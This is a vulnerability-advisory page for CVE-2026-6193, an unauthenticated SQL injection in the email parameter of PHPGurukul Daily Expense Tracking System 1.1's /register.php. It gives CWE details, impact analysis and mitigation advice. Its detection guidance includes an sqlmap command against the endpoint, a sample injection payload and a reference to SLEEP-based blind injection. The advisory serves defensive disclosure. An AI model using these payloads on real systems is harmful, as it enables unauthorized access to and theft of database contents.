CVE-2026-6193

Received Received - Intake

SQL Injection in PHPGurukul Expense Tracker /register.php

Publication date: 2026-04-13

Last updated on: 2026-04-29

Assigner: VulDB

Description

A security flaw has been discovered in PHPGurukul Daily Expense Tracking System 1.1. Affected is an unknown function of the file /register.php. The manipulation of the argument email results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published

2026-04-13

Last Modified

2026-04-29

Generated

2026-06-16

AI Q&A

2026-04-13

EPSS Evaluated

2026-06-15

NVD

CVE-2026-6193

EUVD

EUVD-2026-22032

Affected Vendors & Products

Vendor	Product	Version / Range
phpgurukul	daily_expense_tracking_system	1.1

Helpful Resources

Exploitability

CWE

KEV

CWE ID	Description
CWE-89	The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
CWE-74	The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.

CWE ID

Description

CWE-89

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

CWE-74

The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.

Attack-Flow Graph

Compliance Impact

The SQL injection vulnerability in PHPGurukul Daily Expense Tracking System 1.1 allows attackers to gain unauthorized access to sensitive data, modify or delete records, and disrupt services. Such unauthorized access and potential data breaches can lead to non-compliance with data protection regulations like GDPR and HIPAA, which require the protection of personal and sensitive information.

Failure to remediate this vulnerability may result in exposure of personal data, violating confidentiality and integrity requirements mandated by these standards, potentially leading to legal and financial consequences.

Therefore, addressing this vulnerability promptly is critical to maintaining compliance with common security and privacy regulations.

Executive Summary

The CVE-2026-6193 vulnerability affects the PHPGurukul Daily Expense Tracking System version 1.1, specifically in the "/register.php" file. It is a critical SQL injection vulnerability caused by improper sanitization and validation of the "email" parameter in POST requests.

Attackers can inject malicious SQL code through this parameter, which is directly used in SQL queries without adequate filtering. This flaw allows unauthorized database access, enabling attackers to leak sensitive data, modify or delete records, gain full system control, and disrupt services.

Exploitation requires no authentication or login and has been demonstrated using boolean-based blind and time-based blind SQL injection techniques.

Impact Analysis

This vulnerability can have severe impacts including unauthorized access to the database, leakage of sensitive data, modification or deletion of records, and potential full system compromise.

Attackers can disrupt services and gain control over the affected system without needing any authentication.

Detection Guidance

The vulnerability can be detected by testing the /register.php endpoint for SQL injection via the email parameter in POST requests.

Tools like sqlmap can be used to automate detection and confirm the presence of SQL injection.

Use sqlmap with a command such as: sqlmap -u "http://target/register.php" --data="[email protected]" --risk=3 --level=5
Manually test by injecting SQL payloads in the email parameter, for example: test' OR '1'='1
Use boolean-based blind or time-based blind SQL injection techniques, such as injecting payloads with MySQL's SLEEP function to observe response delays.

Mitigation Strategies

Immediate mitigation steps include implementing prepared statements with parameter binding to prevent SQL injection.

Perform strict input validation and filtering to ensure the email parameter conforms to expected formats.

Restrict database user permissions to the minimum necessary, avoiding use of high-privilege accounts like 'root' or 'admin' for routine operations.

These steps are critical to protect system security and maintain data integrity.

Hi! I’m here to help you understand CVE-2026-6193. Ask me anything about the vulnerability, its impact, or mitigation strategies.

0/70

CVE-2026-6193

SQL Injection in PHPGurukul Expense Tracker /register.php

Description

CVSS Scores

EPSS Scores

Meta Information

Affected Vendors & Products

Helpful Resources

Exploitability

Attack-Flow Graph

AI Quick Actions

Chat Assistant

EPSS Chart